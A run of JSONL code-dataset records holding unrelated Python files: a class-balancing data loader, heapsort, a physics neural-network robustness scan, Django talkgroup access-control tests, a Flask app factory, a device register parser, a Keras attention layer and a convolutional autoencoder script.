within 50%.\n #\n # Balancing Algorithm:\n # * Randomly sample from samples with non-zero min-class ROI counts \n # and zero maximum class ROIs.\n # * Simulaneously, randomly sample a subset of max-class only samples \n # to be removed from the dataset. This levels the field from both \n # directions.\n class_ratio = totalcount[c_min] / totalcount[c_max]\n while (class_ratio < 0.5) & (len(samples) < 3*5000):\n # Find samples with maximum min-max class ratio:\n N = np.sum((counts[:,c_min] > 0) & (counts[:,c_max] == 0))\n M = int(0.5*N)\n \n # Min-class samples to add:\n min_sample = np.nonzero((counts[:,c_min]>0) & (counts[:,c_max]==0))\n min_sample = min_sample[0] # Unfold tuple\n min_sample = min_sample[np.random.randint(0, len(min_sample)-1, N)]\n \n # Max-class samples to remove:\n max_sample = np.nonzero((counts[:,c_min]==0) & (counts[:,c_max]>0))\n max_sample = max_sample[0] # Unfold tuple\n max_sample = max_sample[np.random.randint(0, len(max_sample)-1, M)]\n max_sample = np.unique(max_sample)\n \n # Construct new sample set:\n min_sample = samples[min_sample]\n samples = np.append(np.delete(samples, max_sample), min_sample)\n \n # Recompute total count and min-max class ratio:\n counts = self.count_classes(samples)[:, classids]\n totalcount = np.sum(counts, axis=0)\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n class_ratio = totalcount[c_min] / totalcount[c_max]\n \n # Done, balanced, update samples:\n balancedset = self.Samples[samples,:]\n self._set_sampling_scheme_(balancedset)\n\n # --------------------------------------------------------------------------\n def get_max_rois(self):\n \"\"\"Find the maximum number of ROIs per batch sample in the dataset\"\"\"\n \n maxsize = 0\n for index in self.SampleID:\n rois = self.__getrois__(index);\n maxsize = max(maxsize, rois.shape[0])\n \n return maxsize\n# ______________________________________________________________________________\n\n\ndef partition(worker_id):\n \"\"\"Worker Initialization Function for parallel batch loading.\"\"\"\n \n worker_info = torch.utils.data.get_worker_info()\n dataset = worker_info.dataset\n \n # Re-create BigTIFF objects that turned stale after serialization:\n for region in dataset.BigTIFFs:\n imgfile = dataset.BigTIFFs[region].Source\n dirID = dataset.BigTIFFs[region].DirectoryID\n patchSize = dataset.BigTIFFs[region].PatchSize[dirID]\n \n dataset.BigTIFFs[region] = Bigtiff(imgfile)\n dataset.BigTIFFs[region].setDirectory(dirID)\n dataset.BigTIFFs[region].setPatchSize(patchSize)\n \n # configure the dataset to only process the split workload\n per_worker = int(math.ceil(dataset.SampleID.shape[0] /\n float(worker_info.num_workers) ))\n \n sampleStart = worker_id * per_worker\n sampleEnd = sampleStart + per_worker\n dataset.SampleID = dataset.SampleID[sampleStart:sampleEnd]","sub_path":"model/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":16489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"69382565","text":"from helpers import swap\n\n\n#def parent(i):\n# return i//2\n\n\ndef right(i):\n return 2 * i + 2\n\n\ndef left(i):\n return 2 * i + 1\n\n\ndef heapsort(A):\n build_max_heap(A)\n\n for i in range(0, len(A)):\n swap(A, 0, len(A)-i-1)\n max_heapify(A, 0, len(A)-i-1)\n return A\n\n\ndef build_max_heap(A):\n for i in range(len(A)//2 + 1, -1, -1):\n max_heapify(A, i, len(A))\n\n\ndef max_heapify(A, i, leng):\n length = leng\n l = left(i)\n r = right(i)\n if l < length and A[i] < A[l]:\n largest = l\n else:\n largest = i\n if r < length and A[largest] < A[r]:\n largest = r\n if largest != i:\n swap(A, largest, i)\n max_heapify(A, largest, length)\n","sub_path":"heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"145554090","text":"# global imports\nimport numpy as np\nimport rootpy.plotting as rp\nimport os\nimport sys\nimport socket\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport ROOT\n# local imports\nfiledir = os.path.dirname(os.path.realpath(__file__))\nbasedir = os.path.dirname(filedir)\nsys.path.append(basedir)\n\nimport math\nimport DRACO_Frameworks.DNN_Aachen.DNN_Aachen as DNN_Aachen\nimport DRACO_Frameworks.DNN_Aachen.variable_info as variable_info\nimport DRACO_Frameworks.DNN_Aachen.data_frame as data_frame\nimport pyrootsOfTheCaribbean.plot_configs.plotting_styles as pltstyle\n\ncategory_vars = {\n \"4j_ge3t\": variable_info.variables_4j_3b,\n \"4j_4t\": variable_info.variables_4j_3b,\n \"5j_ge3t\": variable_info.variables_5j_3b,\n \"ge6j_ge3t\": variable_info.variables_6j_3b} \ncategories = {\n \"4j_ge3t\": \"(N_Jets == 4 and N_BTagsM >= 3)\",\n \"4j_4t\": \"(N_Jets == 4 and N_BTagsM == 4)\",\n \"5j_ge3t\": \"(N_Jets == 5 and N_BTagsM >= 3)\",\n \"ge6j_ge3t\": \"(N_Jets >= 6 and N_BTagsM >= 3)\",\n }\nprenet_targets = [\n #\"GenAdd_BB_inacceptance\",\n #\"GenAdd_B_inacceptance\",\n \"GenHiggs_BB_inacceptance\",\n \"GenHiggs_B_inacceptance\",\n \"GenTopHad_B_inacceptance\",\n \"GenTopHad_QQ_inacceptance\",\n \"GenTopHad_Q_inacceptance\",\n \"GenTopLep_B_inacceptance\"\n ]\n\nevent_classes = [\"ttHbb\", \"ttbb\", \"tt2b\", \"ttb\", \"ttcc\", \"ttlf\"]\n\nif \"naf\" in socket.gethostname():\n workpath = \"/nfs/dust/cms/user/vdlinden/DRACO-MLfoy/workdir/\"\nelse:\n workpath = \"/ceph/vanderlinden/DRACO-MLfoy/workdir/\"\n\n\ninPath = workpath+\"/AachenDNN_files\"\n\ntry:\n key = sys.argv[1]\n smearing = eval(sys.argv[2])\n if smearing: print(\"doing smearing (x->x+rnd.normal(0,sigma))\")\n else: print(\"doing scaling (x->x*rnd.normal(1,sigma))\")\nexcept:\n print(\"first argument: JT cagegory\")\n print(\"second argument: smearing/scaling (1/0)\")\n exit()\n\noutpath = workpath+\"/AachenDNN_v2_\"+str(key)+\"/\"\ncheckpoint_path = outpath + \"/checkpoints/trained_main_net.h5py\"\n\nresult_dir = \"/ceph/vanderlinden/DRACO-MLfoy/WiggleStudies/results/KSscans\"\nif smearing: result_dir += \"_smearing/\"\nelse: result_dir += \"_scaling/\"\nif not os.path.exists(result_dir):\n os.makedirs(result_dir)\nresult_dir += \"/\"+str(key)+\"/\"\nif not os.path.exists(result_dir):\n os.makedirs(result_dir)\n\ndnn_aachen = DNN_Aachen.DNN(\n in_path = inPath,\n save_path = outpath,\n event_classes = event_classes,\n event_category = categories[key],\n train_variables = category_vars[key],\n prenet_targets = prenet_targets,\n train_epochs = 500,\n early_stopping = 20,\n eval_metrics = [\"acc\"],\n additional_cut = None)\n\n\ndef gen_discrs( predictions ):\n discr_nodes = [[] for _ in event_classes]\n for evt in predictions:\n pred_class = np.argmax(evt)\n pred_value = evt[pred_class]\n discr_nodes[pred_class].append(pred_value)\n\n return discr_nodes\n\n\n\ndnn_aachen.load_trained_model()\ndata = dnn_aachen.data.get_test_data(as_matrix=False)\nprediction_before = dnn_aachen.main_net.predict(data.values)\n\ndiscriminators_before = gen_discrs(prediction_before)\nbefore_hists = []\n\nbins = 100\nbin_range = [0.,1.]\nfor i_node in range(len(event_classes)):\n node_values = discriminators_before[i_node]\n h = rp.Hist(bins, *bin_range, title = \"before smearing\")\n h.markersize = 0\n h.legendstyle = \"F\"\n h.fillstyle = \"solid\"\n h.linecolor = \"black\"\n h.fill_array( node_values )\n before_hists.append(h)\n\n# generate loop over different std deviation\nstddevs = np.arange(0.005,0.305,0.01)\nprint(stddevs)\n#np.arange(0.01,0.31,0.01)\n\nrate_of_other_argmax = []\nmean_diff = []\nstd_diff = []\n\nks_per_node = [[] for _ in event_classes]\nks_std_per_node = [[] for _ in event_classes]\nn_samples = 20\nfor sigma in stddevs:\n print(\"at sigma \"+str(sigma))\n # apply some uncertainties to data\n def func(x):\n if smearing: return x + np.random.normal(0,sigma)\n else: return x*np.random.normal(1,sigma)\n\n ks_values = [[] for _ in event_classes]\n for n_iter in range(n_samples):\n # wiggle data\n data_new = data.applymap(func)\n\n # generate new predictions\n prediction_after = dnn_aachen.main_net.predict(data_new.values)\n\n discriminators_after = gen_discrs(prediction_after)\n\n for i_node in range(len(event_classes)):\n node_values = discriminators_after[i_node]\n new_h = rp.Hist(bins,*bin_range, title = \"after smearing (s = {:.4f})\".format(sigma))\n new_h.fill_array( node_values )\n\n ks_prob = before_hists[i_node].KolmogorovTest(new_h)#,\"N\")\n ks_values[i_node].append(ks_prob)\n\n for i_node in range(len(event_classes)):\n ks_per_node[i_node].append(np.mean(ks_values[i_node]))\n ks_std_per_node[i_node].append(np.std(ks_values[i_node]))\n\nfor i_node in range(len(event_classes)):\n print(\"plotting hist for node {}\".format(i_node))\n plt.clf()\n plt.figure(figsize = [7,5])\n \n plt.errorbar( stddevs, ks_per_node[i_node], yerr = ks_std_per_node[i_node], fmt = \"o\", color = \"black\") \n\n plt.xlabel(\"smearing factor s\")\n plt.ylabel(\"KS prob\")\n plt.title(str(event_classes[i_node])+\" node\", loc = \"left\")\n plt.title(categories[key], loc = \"right\")\n save_dir = result_dir +\"/KS_scan_{}_node.pdf\".format( event_classes[i_node])\n plt.savefig(save_dir )\n print(\"saved plot at {}\".format(save_dir))\n","sub_path":"studies/wiggleStudies/ks_scan.py","file_name":"ks_scan.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"320053912","text":"# -*- coding: utf-8 -*-\nfrom bogemail import api\nimport datetime\n\ndef main(period, rep_type, prod):\n period = datetime.datetime.strptime(period, '%Y-%m')\n riad_obj = api.RIADObject(period, prod=prod)\n if rep_type == 'w_fcl':\n ent = riad_obj.compliance([('S.125', 'S.125.C', None)])\n \n elif rep_type == 'w_aepey':\n ent1 = riad_obj.compliance([('S.125', 'S.125.B', None)])\n ent2 = riad_obj.compliance([('S.126', 'S.126.X', 'S.126.X.A')])\n ent = ent1[0] | ent2[0], ent1[1] | ent2[1] \n\n elif rep_type == 'w_aedak':\n ent = riad_obj.compliance([('S.126', 'S.126.A', None)])\n\n if len(ent[1]) == 0:\n print('All entities have reported for the reference period')\n riad_obj.non_compl_report(ent)\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(description='Non compliance report')\n parser.add_argument('period', help='Period in Y-m format')\n parser.add_argument('type_warn', choices=['w_fcl', 'w_aepey', 'w_aedak'], help='Specify the non_compliance report')\n parser.add_argument('--prod', dest='prod', action='store_true')\n parser.add_argument('--no-prod', dest='prod', action='store_false')\n parser.set_defaults(prod=True)\n args = parser.parse_args()\n main(args.period, args.type_warn, args.prod)\n","sub_path":"centrale/bogemail/scripts/non_compliance.py","file_name":"non_compliance.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"612766640","text":"import json\n\nfrom django.contrib.auth.models import AnonymousUser, User\nfrom django.test import TestCase, override_settings\nfrom django.test import RequestFactory\nfrom django.utils import timezone\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.test import APIRequestFactory\n\nfrom radio.models import Transmission, TalkGroup, System, TalkGroupAccess, TalkGroupWithSystem, Profile\nfrom radio.views import TalkGroupFilterViewSet\n\nclass TalkgroupRestictTests(TestCase):\n \"\"\"\n Test that only user 1 can see the Test TG 1 TalkGroup when access control is on\n \"\"\"\n def setUp(self):\n self.factory = RequestFactory()\n user1 = User.objects.create_user('user1', 'user1@example.com', 'pass1')\n User.objects.create_user('user2', 'user2@example.com', 'pass2')\n tg1 = TalkGroup.objects.create( dec_id=100, alpha_tag='Test TG 1' )\n Transmission.objects.create( \n start_datetime=timezone.now(),\n audio_file='100-1511023743_8.57213e+08',\n audio_file_type='mp3',\n audio_file_url_path='/',\n talkgroup=100,\n talkgroup_info = tg1,\n freq=0,\n )\n tg1_sys = TalkGroupWithSystem.objects.get(pk=tg1.pk)\n tg_access1 = TalkGroupAccess.objects.create(name='Demo1')\n tg_access1.talkgroups.add(tg1_sys)\n user1.profile.talkgroup_access.add(tg_access1)\n\n def test_talkgroup_exists(self):\n tg = TalkGroup.objects.get(alpha_tag = 'Test TG 1')\n self.assertEquals(str(tg), 'Test TG 1')\n\n @override_settings(ACCESS_TG_RESTRICT=False)\n def test_talkgroup_access_open(self):\n anon = User.objects.get\n response = self.client.get('/api_v1/tg/test-tg-1/')\n self.assertEqual(response.status_code, 200)\n data = json.loads(str(response.content, encoding='utf8'))\n self.assertEquals(data['count'], 1)\n\n @override_settings(ACCESS_TG_RESTRICT=True)\n def test_talkgroup_access_user1(self):\n user = User.objects.get(username='user1')\n request = self.factory.get('/api_v1/tg/test-tg-1/')\n request.user = user\n response = TalkGroupFilterViewSet.as_view()(request, filter_val='test-tg-1').render()\n #print(response.content)\n data = json.loads(str(response.content, encoding='utf8'))\n self.assertEquals(data['count'], 1)\n\n @override_settings(ACCESS_TG_RESTRICT=True)\n def test_talkgroup_access_user2(self):\n user = User.objects.get(username='user2')\n request = self.factory.get('/api_v1/tg/test-tg-1/')\n request.user = user\n response = TalkGroupFilterViewSet.as_view()(request, filter_val='test-tg-1').render()\n #print(response.content)\n data = json.loads(str(response.content, encoding='utf8'))\n self.assertEquals(data['count'], 0)\n\n","sub_path":"radio/tests/test_talkgroup_access.py","file_name":"test_talkgroup_access.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"66021139","text":"from backend import config\nfrom flask import Flask\nfrom flask_cors import CORS\n\n# Decorator pattern:\n# This pattern creates a decorator class which wraps the original class and providing and adding CORS headers to the api responses\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object(config)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n return app\n\napp = create_app()\n\n#Decorator for adding CORS headers to the api responses\nCORS(app)\n","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498657276","text":"import yaml\nfrom collections import namedtuple\nfrom epm.enums import Platform, Architecture\nfrom epm.utils import system_info\nPLATFORM, ARCH = system_info()\n\n\nclass _REQUIRED(object):\n pass\n\n\ndef _section(name, prototype, data):\n obj = {}\n for k, v in prototype.items():\n value = data.get(k, v) # prototype value is None means required filed.\n if isinstance(v, _REQUIRED):\n raise SyntaxError('Register missing filed on section %s %s.' % (name, k))\n obj[k] = value\n\n Section = namedtuple(name, obj.keys())\n return Section._make(obj.values())\n\n\nclass Register(object):\n\n def __init__(self, filename):\n self._filename = filename\n self._local = None\n self._devices = None\n self._sandbox = None\n self._data = {}\n\n with open(filename) as f:\n self._data = yaml.safe_load(f)\n\n\n @property\n def local(self):\n \"\"\"local machine information. [local-machine] section\n\n .username\n .password\n .hostname\n .mount\n\n :return:\n \"\"\"\n if not self._local:\n default = {\n 'username': None,\n 'password': None,\n 'hostname': None,\n 'mount': 'cifs' if PLATFORM == Platform.WINDOWS else 'nfs'\n }\n self._local = _section('local', default, self._data.get('local-machine'))\n return self._local\n\n\n @property\n def devices(self):\n if self._devices is None:\n self._devices = {}\n for name, device in self._data.get('device', {}).items():\n prototype = {\n 'hostname': _REQUIRED,\n 'ssh': None,\n 'system': None\n }\n ssh = None\n system = None\n\n for k, v in device.items():\n if k == 'ssh':\n default = {\n 'username': None,\n 'password': None,\n 'port': 22,\n }\n ssh = _section('device_ssh', default, v)\n if k == 'system':\n default = {\n 'os': None,\n 'arch': None,\n 'crt': None,\n }\n system = _section('device_system', default, v)\n\n self._devices[name] = _section('device', prototype,\n {'ssh': ssh, 'system': system,\n 'hostname': device.get('hostname')})\n return self._devices\n\n @property\n def sandbox(self):\n if self._sandbox is None:\n prototype = {\n 'devices': [],\n }\n return _section('sandbox', property, self._data.get('sandbox'))\n return self._sandbox\n","sub_path":"epm/model/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491056020","text":"import django\n\nfrom . import views\n\nif django.VERSION[:2] >= (2, 0):\n from django.urls import path\n\n urlpatterns = [\n path('', views.SnippetList.as_view()),\n path('/', views.SnippetDetail.as_view()),\n path('views//', views.SnippetViewerList.as_view()),\n ]\nelse:\n from django.conf.urls import url\n\n urlpatterns = [\n url('^$', views.SnippetList.as_view()),\n url(r'^(?P\\d+)/$', views.SnippetDetail.as_view()),\n url(r'^views/(?P\\d+)/$', views.SnippetViewerList.as_view()),\n ]\n","sub_path":"testproj/snippets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"71465960","text":"#%%\nimport matplotlib.pyplot as plt\n\nclass WordFrequency():\n def __init__(self, filepath):\n self.filepath = filepath\n\n def wordFrequency(self):\n with open(self.filepath, 'r') as fp:\n string = fp.read()\n string_list = string.title().split()\n string_dict = {}\n\n for i in string_list:\n string_dict[i] = string_list.count(i)\n\n wordList = [k for k in string_dict.keys()]\n frequencyList = [v for v in string_dict.values()]\n sortedWordList = [wl for fl, wl in sorted(zip(frequencyList, wordList))]\n\n plt.barh(tuple(sortedWordList), sorted(frequencyList), facecolor = 'g')\n plt.title('Indonesia Raya Word Frequency')\n plt.xlabel('Frequency')\n plt.ylabel('Words')\n plt.axis([0, 8, 0, len(wordList)])\n plt.show()\n\nfp = 'C:/Exercises/MrStavin/MrStavinsExercise/14October2019/somestrings.txt'\nwf = WordFrequency(fp)\nwf.wordFrequency()\n#%%","sub_path":"14October2019/wordfrequencies.py","file_name":"wordfrequencies.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"444181122","text":"from keras.layers import Layer\nfrom keras import initializers\nfrom keras import backend as K\n\n\nclass SelfAttention(Layer):\n def __init__(self, regularizer=None, **kwargs):\n super(SelfAttention, self).__init__(**kwargs)\n self.regularizer = regularizer\n self.supports_masking = True\n\n def build(self, input_shape):\n self.context = self.add_weight(name='context',\n shape=(input_shape[-1], 1),\n initializer=initializers.RandomNormal(mean=0.0, stddev=0.05, seed=None),\n regularizer=self.regularizer,\n trainable=True)\n super(SelfAttention, self).build(input_shape)\n\n def call(self, x, mask=None):\n attention_in = K.exp(K.squeeze(K.dot(x, self.context), axis=-1))\n attention = attention_in / K.expand_dims(K.sum(attention_in, axis=-1), -1)\n\n if mask is not None:\n attention = attention * K.cast(mask, 'float32')\n\n weighted_sum = K.batch_dot(K.permute_dimensions(x, [0, 2, 1]), attention)\n return weighted_sum\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], input_shape[-1])\n\n def compute_mask(self, input, input_mask=None):\n return None\n","sub_path":"keras_attention/self_attention.py","file_name":"self_attention.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609982908","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom itertools import zip_longest\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import Model, model_from_json\r\nfrom keras.layers import Input, Conv2D, MaxPooling2D, UpSampling2D, BatchNormalization, Dropout, Flatten, Dense, Reshape, Conv2DTranspose\r\nfrom sklearn.metrics import classification_report\r\nfrom tensorflow.python.keras import backend as K\r\nfrom PIL import Image\r\n\r\ndef numpy_from_dataset(inputpath, numbers, per_2_bytes):\r\n pixels = []\r\n numarray = []\r\n with open(inputpath, \"rb\") as file:\r\n for x in range(numbers):\r\n numarray.append(int.from_bytes(file.read(4), byteorder='big'))\r\n print(\"Storing data in array...\")\r\n # 2d numpy array for images->pixels\r\n if numbers == 4:\r\n if per_2_bytes:\r\n data = file.read(2)\r\n while data:\r\n pixels.append(int.from_bytes(data, byteorder='big'))\r\n data = file.read(2)\r\n pixels = np.array(list(bytes_group(numarray[3], pixels, fillvalue=0)))\r\n else:\r\n pixels = np.array(list(bytes_group(numarray[2]*numarray[3], file.read(), fillvalue=0)))\r\n elif numbers == 2:\r\n pixels = np.array(list(bytes_group(1, file.read(), fillvalue=0)))\r\n return pixels, numarray\r\n\r\ndef bytes_group(n, iterable, fillvalue=None):\r\n return zip_longest(*[iter(iterable)]*n, fillvalue=fillvalue)\r\n\r\ndef encoder(input_img, parameters):\r\n layers = parameters[0]\r\n filter_size = parameters[1]\r\n filters = parameters[2]\r\n conv = input_img\r\n for i in range(layers):\r\n conv = Conv2D(filters, (filter_size, filter_size), activation='relu', padding='same')(conv)\r\n conv = BatchNormalization()(conv)\r\n if (i<2):\r\n conv = MaxPooling2D(pool_size=(2,2))(conv)\r\n # conv = Dropout(0.2)(conv)\r\n filters*=2\r\n return conv\r\n\r\ndef bottleneck(enc, parameters):\r\n flatten_layer = Flatten()(enc)\r\n embedding_layer = Dense(parameters[5])(flatten_layer)\r\n dense_layer = Dense(flatten_layer.shape[1])(embedding_layer)\r\n reshape_layer = Reshape((enc.shape[1], enc.shape[2], enc.shape[3]))(dense_layer)\r\n return reshape_layer, embedding_layer\r\n\r\ndef decoder(conv, parameters):\r\n layers = parameters[0]\r\n filter_size = parameters[1]\r\n filters = parameters[2]*pow(2,parameters[0]-1)\r\n for i in range(layers):\r\n conv = Conv2DTranspose(filters, (filter_size, filter_size), activation='relu', padding='same')(conv)\r\n conv = BatchNormalization()(conv)\r\n if (i>=layers-2):\r\n conv = UpSampling2D((2,2))(conv)\r\n filters/=2\r\n conv = Conv2DTranspose(1, (3, 3), activation='sigmoid', padding='same')(conv)\r\n return conv\r\n\r\ndef save_model(model):\r\n modelname = input(\"Type the name for model(without extension eg.h5): \")\r\n print(\"Saving Model: \"+modelname+\".json & \"+modelname+\".h5...\")\r\n # Save model in JSON file\r\n model_json = model.to_json()\r\n with open(modelname+\".json\", \"w\") as json_file:\r\n json_file.write(model_json)\r\n # Save weights from model in h5 file\r\n model.save_weights(modelname+\".h5\")\r\n\r\ndef load_model(modelname):\r\n # Load model from JSON file\r\n print(\"Loading Model: \"+modelname+\".json & \"+modelname+\".h5...\")\r\n json_file = open(modelname+\".json\", 'r')\r\n autoencoder_json = json_file.read()\r\n json_file.close()\r\n autoencoder = model_from_json(autoencoder_json)\r\n # Load weights from h5 file\r\n autoencoder.load_weights(modelname+\".h5\")\r\n return autoencoder\r\n\r\ndef error_graphs(modeltrain, parameters, train_time, newparameter, indexparm, originparms, hypernames):\r\n loss = []\r\n val = []\r\n values = []\r\n times = []\r\n for i in range(len(newparameter)):\r\n loss.clear()\r\n val.clear()\r\n times.clear()\r\n values.clear()\r\n for j in newparameter[i]:\r\n values.append(j[0])\r\n loss.append(j[1])\r\n val.append(j[2])\r\n times.append(j[3])\r\n if (i == indexparm-1):\r\n values.append(parameters[indexparm-1])\r\n loss.append(modeltrain.history['loss'][-1])\r\n val.append(modeltrain.history['val_loss'][-1])\r\n times.append(train_time)\r\n if newparameter[i]:\r\n graphname = name_parameter(originparms, i, True, hypernames) + \".png\"\r\n plt.plot(values, loss, label='train', linestyle='dashed', linewidth = 3, marker='o', markersize=9)\r\n plt.plot(values, val, label='test', linestyle='dashed', linewidth = 3, marker='o', markersize=9)\r\n plt.title('Loss / Mean Squared Error in '+str(round(times[-1], 3))+'sec')\r\n plt.ylabel('Loss')\r\n plt.xlabel(name_parameter(originparms, i, False, hypernames))\r\n plt.legend(['loss', 'val_loss'], loc='upper left')\r\n print(\"Save graph with name: \",graphname)\r\n plt.savefig(graphname)\r\n plt.show()\r\n plt.close()\r\n return\r\n\r\ndef name_parameter(parameters, number, flag, hypernames):\r\n name = \"\"\r\n if (flag):\r\n if (number==0):\r\n name = \"Lx\"+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==1):\r\n name = \"L\"+str(parameters[0])+\"_FSx\"+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==2):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FLx\"+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==3):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_Ex\"+\"_B\"+str(parameters[4])+\"_LV\"+str(parameters[5])\r\n elif (number==4):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_Bx\"+\"_LV\"+str(parameters[5])\r\n elif (number==5):\r\n name = \"L\"+str(parameters[0])+\"_FS\"+str(parameters[1])+\"_FL\"+str(parameters[2])+\"_E\"+str(parameters[3])+\"_B\"+str(parameters[4])+\"_LVx\"\r\n else:\r\n name = hypernames[number]\r\n return name\r\n\r\ndef reshape_dataset(dataset, numarray):\r\n train_X, valid_X, train_Y, valid_Y = train_test_split(dataset, dataset, test_size=0.2, random_state=13)\r\n # Reshapes to (x, rows, columns)\r\n train_X = np.reshape(train_X.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n valid_X = np.reshape(valid_X.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n train_Y = np.reshape(train_Y.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n valid_Y = np.reshape(valid_Y.astype('float32') / 255., (-1, numarray[2], numarray[3]))\r\n return train_X, valid_X, train_Y, valid_Y\r\n\r\ndef user_choices(model, modeltrain, parameters, originparms, train_time, newparameter, oldparm, df, hypernames):\r\n continue_flag = True\r\n while (True):\r\n try:\r\n run_again = int(input(\"\\nUSER CHOICES: choose one from below options(1-4): \\n1)Execute program with different hyperparameter\\n2)Show error-graphs\\n3)Save the existing model\\n4)Exit\\n---------------> \"))\r\n except:\r\n print(\"Invalid choice.Try again\\n\")\r\n continue\r\n if (run_again==1):\r\n try:\r\n indexparm = int(input(\"Choose what parameter would like to change (options 1-6): \\n1)Layers\\n2)Filter size\\n3)Filters/Layer\\n4)Epochs\\n5)Batch size\\n6)Latent vector\\n---------------> \"))\r\n except:\r\n print(\"Invalid choice.Try again\\n\")\r\n continue\r\n if (indexparm>=1 and indexparm<=6):\r\n try:\r\n changepar = int(input(\"Number for \"+ name_parameter(parameters, indexparm-1, False, hypernames) +\" is \"+str(parameters[indexparm-1])+\". Type the new number: \"))\r\n except:\r\n print(\"Invalid choice.Try again\\n\")\r\n continue\r\n tmpparm = oldparm\r\n if tmpparm<0:\r\n tmpparm = indexparm\r\n tmp = [parameters[tmpparm-1]] + [modeltrain.history['loss'][-1]] + [modeltrain.history['val_loss'][-1]] + [train_time]\r\n newparameter[tmpparm-1].append(tmp)\r\n df.loc[len(df), :] = parameters + [train_time] + [modeltrain.history['loss'][-1]] + [modeltrain.history['val_loss'][-1]]\r\n parameters = originparms.copy()\r\n parameters[indexparm-1] = changepar\r\n oldparm = indexparm\r\n break\r\n else:\r\n print(\"Invalid choice.Try again\\n\")\r\n elif (run_again == 2):\r\n error_graphs(modeltrain, parameters, train_time, newparameter, oldparm, originparms, hypernames)\r\n # continue_flag = False\r\n # break\r\n elif (run_again == 3):\r\n save_model(model)\r\n # continue_flag = False\r\n # break\r\n elif (run_again == 4):\r\n df.loc[len(df), :] = parameters + [train_time] + [modeltrain.history['loss'][-1]] + [modeltrain.history['val_loss'][-1]]\r\n df.drop_duplicates(subset=['Layers', 'Filter_Size', 'Filters/Layer', 'Epochs', 'Batch_Size', 'Latent_vector'], inplace=True)\r\n df = df.sort_values(by = 'Val_Loss', ascending=True)\r\n df.to_csv('loss_values.csv', sep='\\t', index=False)\r\n continue_flag = False\r\n print(\"Program terminates...\\n\")\r\n break\r\n else:\r\n print(\"Invalid choice.Try again\\n\")\r\n return parameters, continue_flag, oldparm;\r\n\r\ndef input_parameters():\r\n parameters = []\r\n try:\r\n parameters.append(int(input(\"Type number of layers: \")))\r\n parameters.append(int(input(\"Type filter size: \")))\r\n parameters.append(int(input(\"Type number of filters/layer: \")))\r\n parameters.append(int(input(\"Type number of epochs: \")))\r\n parameters.append(int(input(\"Type batch size: \")))\r\n parameters.append(int(input(\"Type latent vector size: \")))\r\n except:\r\n print(\"Invalid choice.Try again\\n\")\r\n return parameters\r\n\r\ndef values_df():\r\n try:\r\n df = pd.read_csv('loss_values.csv',sep='\\t')\r\n except:\r\n loss_values = {'Layers': [], 'Filter_Size': [], 'Filters/Layer': [], 'Epochs': [], 'Batch_Size': [], 'Latent_vector': [], 'Train_Time': [], 'Loss': [], 'Val_Loss': []}\r\n df = pd.DataFrame(data=loss_values)\r\n return df\r\n\r\ndef write_output(list_output, numdata, filename):\r\n output_file = open(filename, 'wb')\r\n rows = 1\r\n columns = 10\r\n output_file.write(rows.to_bytes(4, 'big'))\r\n output_file.write(numdata.to_bytes(4, 'big'))\r\n output_file.write(rows.to_bytes(4, 'big'))\r\n output_file.write(columns.to_bytes(4, 'big'))\r\n for i in list_output:\r\n output_file.write(i.to_bytes(2, 'big'))\r\n output_file.close()\r\n\r\n# Normalization using feature scaling between any arbitrary points 0 and 25500\r\ndef normalization(embedding):\r\n a = 0\r\n b = 25500\r\n min = np.min(embedding[0][0])\r\n max = np.max(embedding[0][0])\r\n # https://en.wikipedia.org/wiki/Feature_scaling\r\n normalized = [((b-a)*((i-min)/(max-min))+a).astype(int) for i in embedding[0][0]]\r\n normalized = np.concatenate(normalized).ravel().tolist()\r\n return 